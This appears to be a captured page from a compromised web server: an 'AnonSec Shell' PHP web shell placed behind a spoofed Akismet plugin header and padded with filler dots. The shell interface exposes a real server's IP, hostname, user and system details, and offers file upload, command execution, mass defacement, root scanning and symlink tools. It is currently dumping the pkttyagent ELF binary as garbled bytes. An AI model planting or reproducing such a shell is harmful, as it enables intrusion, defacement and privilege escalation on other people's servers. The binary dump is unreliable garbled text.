#/** * @package Akismet */ /* Plugin Name: Akismet Anti-spam: Spam Protection Plugin URI: https://akismet.com/ Description: Used by millions, Akismet is quite possibly the best way in the world to protect your blog from spam. Akismet Anti-spam keeps your site protected even while you sleep. To get started: activate the Akismet plugin and then go to your Akismet Settings page to set up your API key. Version: 5.4 Requires at least: 5.8 Requires PHP: 7.2 Author: Automattic - Anti-spam Team Author URI: https://automattic.com/wordpress-plugins/ License: GPLv2 or later Text Domain: akismet */ /* This program is free software; you can redistribute it and/or modify it under the terms of the GNU General Public License as published by the Free Software Foundation; either version 2 of the License, or (at your option) any later version. This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details. You should have received a copy of the GNU General Public License along with this program; if not, write to the Free Software Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301, USA. Copyright 2005-2025 Automattic, Inc. */ // Make sure we don't expose any info if called directly . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . AnonSec Shell
AnonSec Shell
Server IP : 62.109.13.187  /  Your IP : 216.73.216.11   [ Reverse IP ]
Web Server : Apache/2.4.6 (CentOS) mpm-itk/2.4.7-04 OpenSSL/1.0.2k-fips PHP/8.2.28
System : Linux robothost.ru 3.10.0-1160.119.1.el7.x86_64 #1 SMP Tue Jun 4 14:43:51 UTC 2024 x86_64
User : mosrembit ( 6064)
PHP Version : 8.2.28
Disable Function : NONE
Domains : 0 Domains
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : ON  |  Sudo : ON  |  Pkexec : ON
Directory :  /usr/bin/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ HOME ]     [ BACKUP SHELL ]     [ JUMPING ]     [ MASS DEFACE ]     [ SCAN ROOT ]     [ SYMLINK ]     

Current File : /usr/bin/pkttyagent
ELF>K#@�D@8	@@@@��888�+�+ �;�; �; d� �;�; �; @@TTTDDP�td * * *<<Q�tdR�td�;�; �; ``/lib64/ld-linux-x86-64.so.2GNU GNU��i�����v�D��T��k<���	H��@<>?@BCDFHIL���k�|����qX�K��|k	C�CE��➭yY2b�����ǯ�:�⏍��E�/nE�Wf������� * HB7��F�, ��> �e��"L�2���Mn���+p5^zyXZR�X��	���%�
�� ��@ ��%XB �@ �@ �
�%�@@ <�
K#�
%e
(@ � @ �@ �(�A � A �libpolkit-gobject-1.so.0g_main_loop_unref_ITM_deregisterTMCloneTableg_object_unrefg_freeg_variant_unrefg_variant_builder_endg_assertion_message_exprg_variant_builder_addg_variant_builder_initg_strdup_printf__gmon_start__g_main_loop_newg_main_loop_rung_logg_type_check_instance_cast_Jv_RegisterClasses_ITM_registerTMCloneTableg_error_freepolkit_unix_process_get_start_timepolkit_unix_process_get_pidpolkit_system_bus_name_newpolkit_unix_process_get_typepolkit_unix_process_new_for_ownerpolkit_unix_process_get_uidpolkit_unix_process_newpolkit_authority_get_syncpolkit_unix_process_new_fulllibpolkit-agent-1.so.0g_printpolkit_agent_text_listener_newpolkit_agent_listener_register_with_optionspolkit_agent_listener_unregisterlibgobject-2.0.so.0g_quark_to_stringg_type_initlibglib-2.0.so.0g_printerrg_variant_new_booleang_option_context_set_descriptiong_option_context_newg_get_prgnameg_option_context_add_main_entriesg_option_context_freeg_option_context_parselibpthread.so.0sigactioncloselibc.so.6fopen__isoc99_sscanfdcgettext__stack_chk_failgetpidkillgetppidsigemptysettcsetattrsigaddsetgetuidfilenotcgetattr__cxa_finalizectermid__libc_start_main_edata__bss_start__libc_csu_fini_IO_stdin_used__data_startts__libc_csu_initttysavesigintsavesigtermsavesigtstpGLIBC_2.2.5GLIBC_2.4GLIBC_2.7� ui	4ii
@ii
Jui	4�; 0$�; �#�; �; �? 
�? �? �? �? >  > (> 0> 8> @> H> P> X> 	`> 
h> p> 
x> �> �> �> �> �> �> �> �> �> �> �> �> �> �> �> �>  ? !? "? #? $ ? %(? &0? '8? (@? )H? *P? +X? ,`? -h? .p? /x? 0�? 1�? 2�? 3�? 4�? 5�? 6�? 7�? 8�? 9�? :�? ;H��H�) H��t�H����5' �%' @�%' h����%
' h�����%' h����%�& h����%�& h����%�& h����%�& h����%�& h�p����%�& h�`����%�& h	�P����%�& h
�@����%�& h�0����%�& h� ����%�& h
�����%�& h�����%�& h���%�& h����%�& h�����%�& h����%z& h����%r& h����%j& h����%b& h����%Z& h�p����%R& h�`����%J& h�P����%B& h�@����%:& h�0����%2& h� ����%*& h�����%"& h�����%& h���%& h ����%
& h!�����%& h"����%�% h#����%�% h$����%�% h%����%�% h&����%�% h'�p����%�% h(�`����%�% h)�P����%�% h*�@����%�% h+�0����%�% h,� ����%�% h-�����%�% h.�����%�% h/���%�% h0����%�% h1�����%�% h2����%z% h3����%r% h4����%j% h5����%b% h6����%Z% h7�p���AWAVAUATUSH��dH�%(H��$�1�H��
H�t$�|$�D$ �D$$L�t$@H��$pH�D$$H�D$0H�D$8�D$(����H��$�H�qƄ$xDŽ$|DŽ$�H��$�H�q
HDŽ$�Ƅ$�DŽ$�H��$�H�D$(DŽ$�Ƅ$�pDŽ$�H��$�H�DŽ$�H��$�H�
H��$�H��	H��$�H�D$0H��$�H��
Ƅ$sDŽ$DŽ$H��$�H��	Ƅ$8DŽ$<DŽ$@H��$�H��	HDŽ$XHDŽ$`Ƅ$hH��$H�D$8DŽ$lDŽ$pHDŽ$xH��$H�n
HDŽ$�HDŽ$�H��$ H�*	H��$(H�)	H��$0H�D$ H��$HH�	H��$P����H�=6	H�D$@����H�5
1��H���T���H�
-
H��H�5O
H��1��%���H��H��H�����H�����H��$pH��H�����H�T$H�t$L��H��������6�|$��H�D$L�`����H�5lH�ź1�A�~E1����L��H��H��1�1�E1�����M��tL������H��tH������M��tL�����H�|$0�
���H�|$8����H���k���H��$�dH3%(D���'H�Ĩ[]A\A]A^A_Ã|$ �PH�|$0H����H�l$,H�L$HH�5�1�H���K������RH�|$0H�5�1�H���,�������L�d$0����H��H�5
	��H�D$@A�~E1�E1�H�h���H�=-H��1�H��1����H�|$@�������1�H�|$8H��t�5���H��H���51�L�����H��I����E1�|$$��1�L��H�D$@����H��I���|E1�1�L�4$M��H��H�����L��I���/���M�����|$(���t
������1��y���H����H�5�H���1���H�r  H�H�:H��t�Z���H�5s  ���l�������L��$�1��&L��$�L���H�qL��H��$�����L���T���H��  L������H�I  L�����H�u! L������1�1����I��H�����M��tL���G���L��A�~�Y����C���H�5�H�=�1�E1�E1�1����E1������u ����H�t$H�|$,����H������L�l$PH�5dL����������H��H�5EH��L��1��A���L���	���I�������|$,���H�����H�� �}��������A���D�^���1���D������H��H�����1���H��H��I������H�����A9��"L��H�
|H�5���1�����t$(H�=^1��������L�t$@A�>�m���A�NI�vH�=�H��1�A�����H�|$@������H�=1�A����L�l$@A�}����I�ME�MH�FI����1�1�E1�����H�|$@����m���L�l$@A�~A�}����A�MI�uH�=kH��1�E1��N���H�|$@�T����1���H�=@1�A�~E1�E1��%�������L��H������H�������x=L��H�����H�����H���$���L��H�
'H�5g��1��<���L�}H�
H�5F��1�����L�#H�
�H�5%��1����E���1�I��^H��H���PTL�H�
�H�=����|��f.��H�� H�=z UH)�H��H��w]�H�D H��t�]��@H�Q H�=J UH)�H��H��H��H��?H�H�u]�H� H��t�]H���@�=) u'H�=� UH��tH�=� �m��h���]� ��@f.�H�=x t&H�� H��tUH�=b H���]�W�����K���f.����S��tx��t[��t>�� ��t"H�� H�8��H�� ����b��]�މ�[�S�H�5� 1ҿ�]��H�5� 1ҿ�E��H�5) 1ҿ�-��z����AWA��AVI��AUI��ATL�%x UH�-x SL)�1�H��H����H��t�L��L��D��A��H��H9�u�H��[]A\A]A^A_Ðf.���H��H���fallbacknotify-fdFDprocessPID[,START_TIME]system-bus-nameBUS_NAMEShow versionpolkitpolkit-1%s: %s
%s: Unexpected argument `%s'
0.112pkttyagent version %s
%i,%lu%ia{sv}r+subject != NULLpkttyagent.cDon't replace existing agent if anyClose FD when the agent is registeredRegister the agent for the specified processRegister the agent owner of BUS_NAMEReport bugs to: %s
%s home page: <%s>http://www.freedesktop.org/wiki/Software/polkithttp://lists.freedesktop.org/mailman/listinfo/polkit-devel%s: Invalid process specifier `%s'
Refusing to render service to dead parents.
Authorization not available. Check if polkit service is running or see debug message for more information.
Error getting authority: %s (%s, %d)
Error creating textual authentication agent: %s (%s, %d)
Error registering authentication agent: %s (%s, %d)
Error closing notify-fd %d: %m
polkit_unix_process_get_pid (POLKIT_UNIX_PROCESS (subject)) == pid_of_callerpolkit_unix_process_get_uid (POLKIT_UNIX_PROCESS (subject)) >= 0polkit_unix_process_get_start_time (POLKIT_UNIX_PROCESS (subject)) > 0main;<���`��+���XP����� `���hzRx����*zRx�$@��FJw�?;*3$"D�����D�D
HLd���B�B�B �B(�A0�A8�G��
8A0A(B BBBAD����eB�E�E �E(�H0�H8�M@l8A0A(B BBB��0$�#�; i�&��
�%�; �; ���o�x
@
T> @���	���o���oh���o�o����o�; &6FVfv��������&6FVfv��������&6FVfv��������&6FVfvpkttyagent.debugR�.��7zXZ�ִF!t/���?]?�E�h=��ڊ�2N�ChS"e拸��tJ�m��&��W�4��].o}���������VC�Z�`�29l4�i���m�&�4Hs{:X዆WS�RS�\�5!]-14��2��C�~ ��$n��)v}�j6���fW�\�C�˷��7��>&���~Y]1���;�^���ݳrBH�Gi�@3�����6�E�CH;��^{���,�
kb��ߋg�$�,!�+"�b���! ��F�<�2B����n-T�6y>��q� �1C'�n8�Tg]]&�*��߯@��ʦ�Mb!��D����NKE{g"״?���I_tݎySێ��O���4Q�Tbr��K�� M�P���c����F�YG��$�g(������h���aiH��`b��Dj�=he[���2�1
�Z�^��a 2�1c��\;�(�Τ��X�L�Ƀ�m�Fl�"�Y��X��n'L���0l:���@��.G���13��S�Pҹ�-zD4��7�������� "����\Q��s�Iq��EGt1<ʚ�˱EAw��d� s�g�m�Q�]F;�:O�-3x!�~5� Ŧt�Y��o)<]L���<���X��15C9�:���U���񃟔t�\�̟Z�{���
	�/{�;C�mDKPt�y����2O��bv�A����i9g���_��N�:1"A/F�@���:�����%]0����GTw1�j���'���4���<P^�e8�{��t�H�����$�ǂ����j��y+݉�‰zQbS��cTOM�qZW=����J`�*��
$�d͇����Wp�i(����4�Oi���[;등�g�YZ.shstrtab.interp.note.ABI-tag.note.gnu.build-id.gnu.hash.dynsym.dynstr.gnu.version.gnu.version_r.rela.dyn.rela.plt.init.text.fini.rodata.eh_frame_hdr.eh_frame.init_array.fini_array.jcr.data.rel.ro.dynamic.got.data.bss.gnu_debuglink.gnu_debugdata88TT !tt$4���o���>@@8Fx
x
TN���o���[���ohh`j���tB��@~��y��������%�%	��%�%�� * *<�`*`*D��; �;��; �;��; �;��; �;��; �;@�> >�@ @� @ @8 �@@��C

Anon7 - 2022
AnonSec Team